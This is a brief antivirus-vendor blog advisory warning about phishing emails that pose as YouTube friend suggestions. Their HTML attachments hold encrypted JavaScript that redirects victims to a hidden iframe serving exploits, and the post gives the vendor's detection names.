During the last few days we received a lot of mails with subjects like “User <username> suggests you to become friends on YouTube”. Since there is no YouTube account connected to those email accounts, we were suspicious and took a closer look at the emails.

The mails have a html file attached and try to make the recipient open that html page in their web browser. In order to bypass mail filters, this html file consists of encrypted JavaScript.

After decrypting the JavaScript it became clear that it redirects the user’s browser to a web site. That web site is just another redirector. On the second redirect, a hidden iframe is included, which tries to download malicious code to the user’s PC by exploiting vulnerabilities in outdated software.

As a general rule, don’t follow links in emails that you didn’t expect, and in no case open attachments from such mails! Avira is detecting the malicious JavaScript as JS/Redirect.qrl and the hidden iframe it tries to redirect to as HTML/IFrame.cef.

Thomas Wegele
Virus Researcher